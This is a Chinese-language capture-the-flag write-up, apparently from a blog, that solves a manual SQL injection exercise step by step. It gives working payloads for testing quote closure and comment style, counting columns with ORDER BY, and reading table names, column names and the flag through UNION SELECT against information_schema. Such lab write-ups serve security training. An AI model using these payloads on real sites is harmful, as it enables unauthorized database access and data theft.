本文详细描述了解决一道SQL题目时的步骤,涉及闭合字符检测、列数确定、联合查询和数据提取,最终成功获取flag值。
PTE解题思路集合 一道简单的sql手注题目,根据基本流程可以解题
第一步 测试闭合情况
![![[Pasted image 20240407091216.png]]](https://i-blog.csdnimg.cn/blog_migrate/488de3f821748036b82a63b85893bd9d.png)
发现存在单引号
1' and 1=1
![![[Pasted image 20240407091431.png]]](https://i-blog.csdnimg.cn/blog_migrate/219eb0ae4896277075b0c2c88fbc9699.png)
无回显,存在–+ 或 %23 或 #
1' and 1=1 --+
![![[Pasted image 20240407091552.png]]](https://i-blog.csdnimg.cn/blog_migrate/b57e404fa1b94ba630c99ef10644ebea.png)
无正常回显
1' and 1=1 #
![![[Pasted image 20240407091803.png]]](https://i-blog.csdnimg.cn/blog_migrate/79873e1428add5e37bf2763b63fdaf05.png)
有正常回显,可以确定闭合方式是单引号闭合,截断方式是 #
第二步 测试列数(二分法)
先猜测是10列
1' order by 10#
![![[Pasted image 20240407092212.png]]](https://i-blog.csdnimg.cn/blog_migrate/a1d5456dd727bdbfc609567366b675a2.png)
无回显,小于10,根据二分法选取5
![![[Pasted image 20240407092252.png]]](https://i-blog.csdnimg.cn/blog_migrate/111527f592060b87b6f82be2587fce07.png)
依然无回显,小于5,测试 4,3,2,1
![![[Pasted image 20240407092334.png]]](https://i-blog.csdnimg.cn/blog_migrate/6bbff1fbc2d4f583b73e565b7d39ed4e.png)
有回显,证明表格列数为4
第三步 确定回显位置(联合查询)
-1' union select 1,2,3,4#
![![[Pasted image 20240407092520.png]]](https://i-blog.csdnimg.cn/blog_migrate/34f2739b307a2019a8777be4b674148c.png)
第四步 库名、表名、列名、数据逐一查询
查询表名
-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
![![[Pasted image 20240407092949.png]]](https://i-blog.csdnimg.cn/blog_migrate/2db06b434e851c976751dbcfc794de9a.png)
得到回显,找到表名,存在flag表,查找该表中的列名
-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='flag'#
![![[Pasted image 20240407094006.png]]](https://i-blog.csdnimg.cn/blog_migrate/4dbc4435fbb03121901c76c6fca0397f.png)
找到列名flag,进而查询列中数据
-1' union select 1,2,3,group_concat(flag) from flag#
![![[Pasted image 20240407094416.png]]](https://i-blog.csdnimg.cn/blog_migrate/93b99316b900463b07de535be31ebf47.png)
得到flag,解题完毕 hazel{ea957c27-c198-4d7c-a4e6-7c8d18efa3a1}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
